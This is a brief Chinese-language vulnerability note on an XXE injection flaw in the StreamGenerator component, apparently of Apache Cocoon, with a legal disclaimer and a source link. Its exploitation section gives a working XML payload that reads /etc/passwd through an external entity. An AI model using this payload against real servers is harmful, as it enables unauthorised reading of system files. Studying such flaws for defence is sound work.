請遵守網絡安全法!!!本文僅供學習交流使用!用於任何非授權滲透、非法目的攻擊、從事非法活動均與筆者無關!讀者自行承擔其惡果!
漏洞簡介
程序使用了StreamGenerator這個方法時,解析從外部請求的xml數據包未做相關的限制,惡意用戶就可以構造任意的xml表達式,使服務器解析達到XML注入的安全問題。
利用姿勢
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&ent;</lastName>
</userInfo>
來源
http://mail-archives.apache.org/mod_mbox/cocoon-users/202009.mbox/author